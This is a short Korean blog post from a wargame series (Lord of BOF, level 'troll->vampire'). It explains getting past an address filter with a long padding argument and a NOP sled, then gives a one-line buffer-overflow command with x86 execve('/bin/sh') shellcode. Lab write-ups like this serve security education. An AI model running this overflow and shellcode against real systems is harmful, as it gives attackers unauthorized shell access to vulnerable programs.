고졸백수해킹일기

troll->vampire 본문

Wargame/lob

troll->vampire

ExploitSori 2018. 1. 26. 08:16

주소 필터링으로 0x??ff????를 쓸수가 없다.

메모리는 거꾸로 자라는 특성을 이용하여 많은 nop를 채워주고 그쪽 메모리로 ret을 돌려 쉘을 딴다


./vampire `python -c 'print "\x90"*44+"\x9c\x76\xfe\xbf"'` `python -c 'print "A"*99999+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`


music world

music world

'Wargame > lob' 카테고리의 다른 글

skeleton->golem  (0) 2018.01.30
vampire->skeleton  (0) 2018.01.28
orge->troll  (0) 2018.01.26
darkelf->orge  (0) 2018.01.26
wolfman->darkelf  (0) 2018.01.26
'Wargame/lob' Related Articles more